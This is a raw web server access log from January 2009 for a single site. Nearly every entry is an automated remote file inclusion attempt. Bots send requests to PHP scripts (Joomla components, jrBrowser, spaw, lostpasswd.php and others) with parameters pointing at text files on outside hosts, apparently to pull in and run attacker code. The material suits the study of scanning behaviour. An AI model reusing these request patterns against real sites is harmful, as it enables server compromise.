72.29.93.130 - - [06/Jan/2009:04:34:59 -0800] "GET /logs/access_081118.log/errors.php?error=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.29.93.130 - - [06/Jan/2009:04:34:59 -0800] "GET /errors.php?error=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.29.93.130 - - [06/Jan/2009:04:34:59 -0800] "GET /logs/errors.php?error=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:35:04 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:35:05 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:35:05 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:04:35:15 -0800] "GET /login.php?dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:35:54 -0800] "GET /logs/access_081207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:35:54 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:35:54 -0800] "GET /logs/access_081118.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:35:54 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:36:08 -0800] "GET /logs/access_081207.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:36:11 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:36:11 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:38 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:38 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:38 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:38 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:47 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:36:50 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:36:51 -0800] "GET /logs/access_081208.log//include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
208.71.170.135 - - [06/Jan/2009:04:37:00 -0800] "GET /errors.php?error=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
208.71.170.135 - - [06/Jan/2009:04:37:00 -0800] "GET /logs/access_081118.log/errors.php?error=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
208.71.170.135 - - [06/Jan/2009:04:37:00 -0800] "GET /logs/errors.php?error=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:38:00 -0800] "GET /logs/access_081214.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
201.120.7.229 - - [06/Jan/2009:04:38:44 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
201.120.7.229 - - [06/Jan/2009:04:38:44 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
201.120.7.229 - - [06/Jan/2009:04:38:44 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
201.120.7.229 - - [06/Jan/2009:04:38:45 -0800] "GET /logs/access_081103.log/lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:36 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:36 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:36 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:36 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:36 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:39:37 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:39:53 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:39:54 -0800] "GET /Neos_Chronos/header.php?base_folder=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:40:01 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:40:01 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
72.172.213.99 - - [06/Jan/2009:04:40:03 -0800] "GET /logs/access_081118.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
72.172.213.99 - - [06/Jan/2009:04:40:04 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
72.172.213.99 - - [06/Jan/2009:04:40:04 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:40:23 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:40:23 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:26 -0800] "GET /logs/access_081118.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:27 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:27 -0800] "GET /logs/access_081118.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:28 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:40:28 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:40:36 -0800] "GET /logs/access_081224.log//include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:40:37 -0800] "GET /include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:40:37 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:40:46 -0800] "GET /?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:40:46 -0800] "GET /logs//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 1658 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:40:49 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
72.172.213.99 - - [06/Jan/2009:04:43:08 -0800] "GET /logs/access_081118.log%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:12 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:12 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:12 -0800] "GET /logs/access_081204.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:43:15 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:43:15 -0800] "GET /?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
203.231.233.54 - - [06/Jan/2009:04:43:15 -0800] "GET /logs//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 1658 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:15 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:15 -0800] "GET /logs/access_081204.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
207.182.137.218 - - [06/Jan/2009:04:43:15 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
72.172.213.99 - - [06/Jan/2009:04:43:25 -0800] "GET /logs/access_081207.log%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:43:29 -0800] "GET /logs/access_081103.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:43:39 -0800] "GET /logs/access_081103.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:44:39 -0800] "GET /logs/access_081208.log//include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:46:55 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:46:58 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:18 -0800] "GET /logs/access_081118.log/scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:20 -0800] "GET /scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:22 -0800] "GET /logs/scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:33 -0800] "GET /logs/access_081118.log/scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:34 -0800] "GET /scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:04:47:34 -0800] "GET /logs/scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:49:12 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:49:12 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:49:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:49:12 -0800] "GET /logs/access_081103.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:50:55 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:50:55 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:50:55 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:51:00 -0800] "GET /logs/access_081103.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:51:50 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:51:53 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:51:53 -0800] "GET /logs/access_081103.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:04:51:53 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:52:13 -0800] "GET /logs/access_081118.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:52:13 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:52:13 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:52:19 -0800] "GET /logs/access_081207.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:04:52:26 -0800] "GET /logs/access_081118.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:04:52:26 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:04:52:26 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
